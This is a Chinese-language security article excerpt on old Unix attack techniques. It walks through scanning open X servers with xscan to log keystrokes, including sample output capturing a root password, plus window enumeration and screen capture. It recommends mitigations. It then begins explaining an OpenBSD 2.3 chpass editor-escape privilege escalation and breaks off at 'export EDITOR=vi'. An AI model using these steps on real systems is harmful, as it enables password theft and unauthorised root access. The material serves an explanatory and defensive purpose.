战术攻防思维撷粹(2)

核心提示： 通过xscan可以扫描出具有xhost +设置的X服务器，pendleto于96年写的一个小工具，战术攻防思维撷粹(2)(10)，经久不衰呀!扫描网络中开放Xwindow并且允许连接的主机，并自动开始记录该Xwindow系统的所有键盘击键，于是可以设置编辑器为vi，从而逸出一个shell，

通过xscan可以扫描出具有xhost +设置的X服务器。pendleto于96年写的一个小工具，经久不衰呀!扫描网络中开放Xwindow并且允许连接的主机，并自动开始记录该Xwindow系统的所有键盘击键。

[Labmachine]$xscan Xmachine
Scanning hostname Xmachine…
Connection to Xmachine (192.168.1.65) on port 6000
Connected.
Host quake is running X.
Starting keyboard logging of host Xmachine:0.0 to file KEYLOG.Xmachine:0.0…

#其键盘记录文件为KEYLOG.Xmachine，记录非常详细：

[Labmachine]$tail –f KEYLOG.Xmachine:0.0
su
root[Shift_R]sys
#

使用xlswins确定目标系统窗口的16进制ID号

[Labmachine]#xlswins –display Xmachine:0.0

……

0x1000385 (netscape)

……

如果限制xhost -，那么仍然可以绕过认证，使用xwd来截获荧屏的瞬间图像。对于X window的使用应该注意在防火墙封堵6000-6063端口，使用SSH等方式加密X 会话，并使用XDM-AUTHORIZATION-1等安全认证机制防止偷窃行为的发生。

【文件描述字符的利用】

文件描述字符(file descriptor)是文件属性的字符象征，0、1和2分别表示了标准输入、标准输出和标准错误输出。当打开或创建文件的时候，内核为调用程序分配一个文件描述字，可用于读写该文件。按照这个原理，如果更改写某个关键的系统文件，我们可以使用文件描述进行写入操作，从而得到root权限。

OpenBSD 2.3版本中存在这样的漏洞，用于修改密码的chpass执行时允许普通用户使用自选的编辑器编辑临时文件，于是可以设置编辑器为vi，从而逸出一个shell，这样就可以在/etc/master.passwd中创建一个uid为零的帐号，以此获得root访问权限： [BigHole]$export EDITOR=vi